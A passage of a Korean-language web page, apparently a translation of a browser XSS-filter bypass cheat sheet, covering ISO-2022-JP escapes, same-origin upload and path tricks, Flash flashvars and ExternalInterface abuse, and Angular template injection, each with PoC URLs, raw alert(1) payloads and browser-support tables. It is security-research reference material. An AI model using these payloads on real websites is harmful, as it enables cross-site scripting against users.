href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#iso-2022-jp%E3%81%AE%E3%82%A8%E3%82%B9%E3%82%B1%E3%83%BC%E3%83%97%E3%82%B7%E3%83%BC%E3%82%B1%E3%83%B3%E3%82%B9%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>ISO-2022-JP \uc774\uc2a4\ucf00\uc774\ud504 \uc2dc\ud000\uc2a4 \uc0ac\uc6a9<\/h3>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac <\/li><li>\ud398\uc774\uc9c0\uc5d0 \uc5b8\uc5b4\uc14b \uc9c0\uc815\uc774 \uc5c6\uc74c<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>ISO-2022-JP\uc758 HTML \uc911\uc5d0\uc11c <code>[0x1B](B<\/code>\u3001<code>[0x1B](H<\/code>\u3001<code>[0x1B](J<\/code>\ub77c\ub294 \ubb38\uc790\uc5f4\uc740 \ubb34\uc2dc\ub428. \uc774\uac83\uc744 \uc774\ubca4\ud2b8\ud578\ub4e4\ub7ec \uc0ac\uc774\uc5d0 \ub07c\uc6cc\ub123\uc74c\uc73c\ub85c\uc368 \uc6b0\ud68c\uac00 \uac00\ub2a5.<br>\ub610, Chrome\/Safari\uc5d0\uc11c\ub294 <code>[0x1B]$@[0x0A]<\/code>\ub77c\ub294 \ubb38\uc790\uc5f4\uc774 <code>[0x0A]<\/code>\uc640 \uac19\uac8c \ucde8\uae09\ub418\uc9c0\ub9cc, XSS Auditor\ub294 \ud574\uc11d\ud558\uc9c0 \ubabb\ud558\uc5ec \uc6b0\ud68c\uac00 \uac00\ub2a5.<\/p>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=114941\">https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=114941<\/a><\/li><li><a href=\"https:\/\/l0.cm\/encodings\/test3\/\">https:\/\/l0.cm\/encodings\/test3\/<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Bnload=alert(1)%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Bnload=alert(1)%3E<\/a><\/li><li><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Hnload=alert(1)%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Hnload=alert(1)%3E<\/a><\/li><li><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Jnload=alert(1)%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Csvg%20o%1B(Jnload=alert(1)%3E<\/a><\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;meta charset=iso-2022-jp&gt;&lt;svg o[0x1B](Bnload=alert(1)&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>(\u203b $\uae30\ud638\uac00 \uc784\uc758\ub85c \uc778\ucf54\ub529\ub418\uc5b4 \uc758\ub3c4\ub300\ub85c \ub3d9\uc791\ud558\uc9c0 \uc54a\uae30 \ub54c\ubb38\uc5d0 $\ub97c \ud3ec\ud568\ud558\ub294 \ubc29\ubc95\uc73c\ub85c \uc6b0\ud68c\uac00 \uac00\ub2a5)<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/tinyurl.com\/l9mxds2\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0A%3C\/script%3E<\/a><\/li><li><a href=\"https:\/\/tinyurl.com\/ml23lh9\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$B%0A%3C\/script%3E<\/a><\/li><li><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B(I%0A%3C\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B(I%0A%3C\/script%3E<\/a><\/li><li><a href=\"https:\/\/tinyurl.com\/lfks6v6\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cmeta%20charset=iso-2022-jp%3E%3Cscript%3Ealert(1)%1B$@%0D%3C\/script%3E<\/a><\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;meta charset=iso-2022-jp&gt;&lt;script&gt;alert(1)[0x1B]$@[0x0A]&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E5%90%8C%E4%B8%80%E3%83%89%E3%83%A1%E3%82%A4%E3%83%B3%E3%81%AE%E3%83%AA%E3%82%BD%E3%83%BC%E3%82%B9%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a> \ub3d9\uc77c\ud55c \ub3c4\uba54\uc778\uc758 \ub9ac\uc18c\uc2a4 \uc0ac\uc6a9 <\/h3>\n\n\n\n<p>XSS Auditor\ub294 \ucffc\ub9ac\uac00 \ud3ec\ud568\ub418\uc9c0 \uc54a\uc740 \ub3d9\uc77c\ud55c \ub3c4\uba54\uc778\uc73c\ub85c\ubd80\ud130\uc758 \ub9ac\uc18c\uc2a4 \uc0ac\uc6a9\uc744 \ucc28\ub2e8\ud558\uc9c0 \uc54a\uc74c<br>\ub3d9\uc77c\ud55c \ub3c4\uba54\uc778\uc5d0 \uacf5\uaca9\uc5d0 \ud544\uc694\ud55c \ud30c\uc77c\uc744 \uc5c5\ub85c\ub4dc \ud560 \uc218 \uc788\uc744 \uacbd\uc6b0\uc5d0 \uc6b0\ud68c\uac00 \uac00\ub2a5\ud55c \ucf00\uc774\uc2a4\uac00 \uc874\uc7ac\ud568<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E3%83%91%E3%82%B9%E3%81%ABxss%E3%81%8C%E3%81%82%E3%82%8B%E3%82%B1%E3%83%BC%E3%82%B9chrome%E3%81%AE%E3%81%BF\"><\/a>Path\ub97c \uc0ac\uc6a9\ud55c XSS<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uc694\uccad\ud558\ub294 \ud398\uc774\uc9c0\uc758 \uc8fc\uc18c\uc5d0 \ucffc\ub9ac\uac00 \ud3ec\ud568\ub418\uc9c0 \uc54a\uc74c<\/li><\/ol>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/path\/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E\">https:\/\/vulnerabledoma.in\/bypass\/path\/%3Clink%20rel=import%20href=%22%2Fbypass%2Fpath%2F%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">PATH_INFO:\/&lt;link rel=import href=\"\/bypass\/path\/&lt;script&gt;alert(1)&lt;\/script&gt;\"&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E3%83%95%E3%82%A1%E3%82%A4%E3%83%AB%E3%81%AE%E3%82%A2%E3%83%83%E3%83%97%E3%83%AD%E3%83%BC%E3%83%89%E6%A9%9F%E8%83%BD\"><\/a>\ud30c\uc77c \uc5c5\ub85c\ub4dc \uae30\ub2a5 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uc0ac\uc6a9\uc790\uac00 \uc5c5\ub85c\ub4dc\ud55c \ud30c\uc77c\uc774 \uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 \uc5c5\ub85c\ub4dc \ub428<\/li><\/ol>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cscript%20src=\/bypass\/usercontent\/xss.js%3E%3C\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cscript%20src=\/bypass\/usercontent\/xss.js%3E%3C\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script src=\/bypass\/usercontent\/xss.js&gt;&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/usercontent\/icon.jpg%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=\/bypass\/usercontent\/icon.jpg%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;link rel=import href=\/bypass\/usercontent\/icon.jpg&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>X<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>X<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#flash%E3%81%A8flashvars%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>Flash\uc640 flashvars\uc758 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 ExternalInterface.call() \ud568\uc218\uc5d0 \uc774\uc2a4\ucf00\uc774\ud504 \ub418\uc9c0 \uc54a\uc740 \ubb38\uc790\uc5f4\uc744 \ud30c\ub77c\ubbf8\ud130\ub85c \ub118\uaca8\uc8fc\ub294 Flash\uac00 \uc874\uc7ac<\/li><li>\uacf5\uaca9 \ud0c0\uac9f\uc774 flash\ub97c \uc774\uc6a9 \uac00\ub2a5<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p><code>flashvars<\/code>\uc18d\uc131\uc744 \uc0ac\uc6a9\ud558\uba74, Flash\uc5d0\uc11c \ud30c\ub77c\ubbf8\ud130\ub97c \ubd80\uc5ec\ud558\uc9c0 \uc54a\uc544\ub3c4 \ud30c\ub77c\ubbf8\ud130\uac00 \uc804\uc1a1\ub428<br>(= Flash\uc5d0\uc11c\ub294 XSS \ub300\ucc45\uc758 \uc77c\ud658\uc73c\ub85c URL\uc5d0 \uc9c1\uc811 \ud30c\ub77c\ubbf8\ud130\ub97c \ub118\uae30\ub294 \uac83\uc774 \uc81c\ud55c\ub418\uc5b4 \uc788\uc9c0\ub9cc, <code>flashvars<\/code>\ub97c \uc0ac\uc6a9\ud558\ub294 \uacbd\uc6b0\uc5d0\ub294 \uac00\ub2a5\ud568)<br>\ub610\ud55c, <code>Content-Security-Policy: default-src 'self'<\/code>\uc640 \uac19\uc740 CSP\uac00 \uc124\uc815\ub418\uc5b4 \uc788\ub294 \uacbd\uc6b0, CSP\uc758 \uc6b0\ud68c\uc5d0\ub3c4 \uc0ac\uc6a9\uc774 \uac00\ub2a5\ud568<\/p>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?csp=self&amp;q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})\\%22)-(alert=alert(1)))}catch(e){}\/\/%27%20allowscriptaccess=always%20src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?csp=self&amp;q=%3Cembed%20name=a%20flashvars=%27autoplay=true%26file=%22})\\%22)-(alert=alert(1)))}<br>catch(e){}\/\/%27%20allowscriptaccess=always%20src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;embed name=a flashvars='autoplay=true&amp;file=\"})\\\")-(alert=alert(1)))}catch(e){}\/\/'<br>allowscriptaccess=always src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>ActionScript:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ExternalInterface.call(\"setTimeout\", ExternalInterface.objectID + '_event' + \"('\" + eventName + \"',\" + eventValues + \")\", 0);<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#flash%E3%81%AEexternalinterfaceobjectid%E3%81%A8externalinterfacecall%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>Flash\uc640 ExternalInterface.objectID\uc640 ExternalInterface.call()\uc758 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 <code>ExternalInterface.objectID<\/code>\uc640<code>ExternalInterface.call()<\/code>\uc73c\ub85c \ub118\uaca8\uc9c0\ub294 Flash\uac00 \uc874\uc7ac<\/li><li> \uacf5\uaca9 \ud0c0\uac9f\uc774 flash\ub97c \uc774\uc6a9 \uac00\ub2a5<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>\ud50c\ub798\uc2dc\ub97c embed\ud560 \ub54c \ud574\ub2f9 \ud0dc\uadf8\uc758 name \uc18d\uc131\uc774 ExternalInterface.objectID \uac12\uc73c\ub85c \uc124\uc815\ub428<br>\ub2e8\ub3c5\uc73c\ub85c\ub294 XSS\uac00 \ubd88\uac00\ub2a5\ud558\uc9c0\ub9cc, \uc6b0\ud68c\uc5d0 \uc545\uc6a9\ub420 \uc218 \uc788\uc74c<br><code>Content-Security-Policy: default-src 'self'<\/code>\uc640 \uac19\uc740 CSP\uac00 \uc124\uc815\ub418\uc5b4 \uc788\ub294 \uacbd\uc6b0, CSP\uc758 \uc6b0\ud68c\uc5d0\ub3c4 \uc0ac\uc6a9\uc774 \uac00\ub2a5\ud568<\/p>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?csp=self&amp;q=%3Cembed%20name=%27alert(1)-%27%20allowscriptaccess=always%20src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?csp=self&amp;q=%3Cembed%20name=%27alert(1)-<br>%27%20allowscriptaccess=always%20src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;embed name='alert(1)-' allowscriptaccess=always src=\/\/vulnerabledoma.in\/bypass\/wp-includes\/js\/mediaelement\/flashmediaelement.swf&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>ActionScript:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ExternalInterface.call(ExternalInterface.objectID + '_init');<\/pre>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#angular%E3%81%AE%E5%88%A9%E7%94%A8\"><\/a>Angular\uc758 \uc0ac\uc6a9<\/h4>\n\n\n\n<p>\uacf5\uaca9 \uac00\ub2a5 \uc870\uac74:<\/p>\n\n\n\n<ol><li>\uc784\uc758\uc758 \ud0dc\uadf8\ub97c \uc4f8 \uc218 \uc788\ub294 XSS \ucde8\uc57d\uc810\uc774 \uc874\uc7ac<\/li><li>\uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 Angular \ud30c\uc77c\uc774 \uc874\uc7ac\ud558\uac70\ub098 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 Angular\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc874\uc7ac<\/li><\/ol>\n\n\n\n<p>\ubcf4\ucda9:<\/p>\n\n\n\n<p>Angular\ub294 ng-app\uc774\ub77c\ub294 \uc18d\uc131\uc744 \uac16\ub294 \ud0dc\uadf8 \ub0b4\ubd80\uc5d0\uc11c {{}}\ub85c \uac10\uc2f8\uc9c4 \ud15c\ud50c\ub9bf\uc744 \ub80c\ub354\ub9c1 \ud568. \uc774 \ub54c \ud15c\ud50c\ub9bf\uc740 \uc790\ubc14\uc2a4\ud06c\ub9bd\ud2b8\ub97c \uc2e4\ud589\ud568<\/p>\n\n\n\n<p>\ucc38\uace0URL:<\/p>\n\n\n\n<ul><li><a href=\"https:\/\/blog.portswigger.net\/2016\/01\/xss-without-html-client-side-template.html\">https:\/\/blog.portswigger.net\/2016\/01\/xss-without-html-client-side-template.html<\/a><\/li><\/ul>\n\n\n\n<p>PoC:<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cscript%20src=%22\/js\/angular1.6.4.min.js%22%3E%3C\/script%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}}\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Cscript%20src=%22\/js\/angular1.6.4.min.js%22%3E%3C\/script%3E%3Cp%20ng-app%3E{{constructor.constructor(%27alert(1)%27)()}}<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script src=\"\/js\/angular1.6.4.min.js\"&gt;&lt;\/script&gt;&lt;p ng-app&gt;{{constructor.constructor('alert(1)')()}}<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\uac19\uc740 \uc624\ub9ac\uc9c4\ub0b4\uc5d0 CORS\uc5d0 \ub300\uc751\ud55c CDN\uc73c\ub85c\ubd80\ud130 Angular\ub97c \ub85c\ub4dc\ud558\ub294 \ud398\uc774\uc9c0\uac00 \uc788\ub2e4\uba74, HTML Imports\ub85c\ubd80\ud130 \uc678\ubd80 \ub9ac\uc18c\uc2a4\ub97c \uac04\uc811\uc801\uc73c\ub85c \ub85c\ub4dc\ud560 \uc218 \uc788\uc74c<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E%7B%7Bconstructor.constructor(%27alert(1)%27)()%7D%7D\">https:\/\/vulnerabledoma.in\/bypass\/text?q=%3Clink%20rel=import%20href=angular.html%3E%3Cp%20ng-app%3E<br>{{constructor.constructor(%27alert(1)%27)()}}<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;link rel=import href=angular.html&gt;&lt;p ng-app&gt;{{constructor.constructor('alert(1)')()}}<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" 